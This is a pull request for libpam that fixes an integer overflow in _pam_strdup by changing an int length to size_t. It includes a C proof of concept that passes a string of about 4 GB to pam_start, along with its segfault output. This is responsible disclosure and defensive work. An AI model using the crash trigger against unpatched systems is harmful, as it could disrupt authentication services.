### PR TITLE
libpam: fix possible heap overflow in _pam_strdup

### DIFF
--- a/libpam/pam_misc.c
+++ b/libpam/pam_misc.c
@@ -123,7 +123,7 @@ char *_pam_strdup(const char *x)
      register char *new=NULL;
 
      if (x != NULL) {
-	  register int len;
+	  register size_t len;
 
 	  len = strlen (x) + 1;  /* length of string including NUL */
 	  if ((new = malloc(len)) == NULL) {


### PR DESCRIPTION
It is possible to trigger an integer overflow in _pam_strdup if the passed string is longer than INT_MAX, which could lead to a smaller memory allocation than needed for the strcpy call.

This in turn could lead to a heap overflow.

Proof of Concept (64 bit system with enough RAM, i.e. more than 4 GB):
```
#include <security/pam_appl.h>

#include <err.h>
#include <limits.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

static int
test_conv (int num_msg, const struct pam_message **msgm,
           struct pam_response **response, void *appdata_ptr) {
  return 0;
}

static struct pam_conv conv = {
  test_conv,
  NULL
};

int main(void) {
        pam_handle_t *pamh;
        char *p;

        /* create a string which returns UINT_MAX when called with strlen */
        if ((p = malloc((size_t)UINT_MAX + 1)) == NULL)
                err(1, "malloc");
        memset(p, 'A', UINT_MAX);
        p[UINT_MAX] = '\0';

        pam_start(p, "nobody", &conv, &pamh);
        return 0;
}
```

Output is:
```
$ gcc -lpam -o poc poc.c
$ ./poc
Segmentation fault (core dumped)
```